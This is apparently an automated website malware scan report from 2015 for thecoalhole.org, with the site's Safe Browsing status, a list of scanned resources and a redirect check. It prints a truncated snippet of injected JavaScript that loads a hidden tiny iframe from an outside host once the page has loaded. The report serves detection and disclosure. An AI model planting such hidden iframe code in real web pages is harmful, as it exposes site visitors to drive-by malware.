Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecoalhole.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thecoalhole.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 24 Jan 2015 06:16:29 GMT Location: http://thecoalhole.org/ Server: Apache Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://thecoalhole.org/xmlrpc.php | clean |
http://thecoalhole.org/ | 200 OK Content-Length: 54665 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://spa-sibo.org/wp-content/plugins/zadat_vopros/google-analystyc.php | 500 Can't connect to spa-sibo.org:80 Content-Length: 187 Content-Type: text/plain | clean |
http://spa-sibo.org/test404page.js | 500 Can't connect to spa-sibo.org:80 Content-Length: 187 Content-Type: text/plain | clean |
http://adultbiz.in/new/jquery.php | 200 OK Content-Length: 8693 Content-Type: text/html | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/javascript | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 28902 Content-Type: application/javascript | clean |
http://adultbiz.in/scripts/feedmeCaf.php?q=&ip=78.158.11.226&max=10&hl=lt&d=adultbiz.in&ron=0&adult=0 | 200 OK Content-Length: 5488 Content-Type: text/plain | clean |
http://twitterwidget.net/twitter_class/index.php?ors=&phrase=UK+energy&height=400px | 200 OK Content-Length: 342 Content-Type: text/html | clean |
http://www.thecoalhole.org/wp-content/themes/black-letterhead/js/feed.js | 200 OK Content-Length: 373 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecoalhole.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 06:16:30 GMT
Server: Apache
Content-Encoding: none
Content-Length: 54665
Content-Type: text/html; charset=UTF-8
Link: <http://thecoalhole.org/>; rel=shortlink
X-Pingback: http://thecoalhole.org/xmlrpc.php
...54665 bytes of data.
GET / HTTP/1.1
Host: thecoalhole.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 06:16:30 GMT
Server: Apache
Content-Encoding: none
Content-Length: 54665
Content-Type: text/html; charset=UTF-8
Link: <http://thecoalhole.org/>; rel=shortlink
X-Pingback: http://thecoalhole.org/xmlrpc.php
...54665 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecoalhole.org
Referer: http://www.google.com/search?q=thecoalhole.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thecoalhole.org
Referer: http://www.google.com/search?q=thecoalhole.org
Result:
The result is similar to the first query. There are no suspicious redirects found.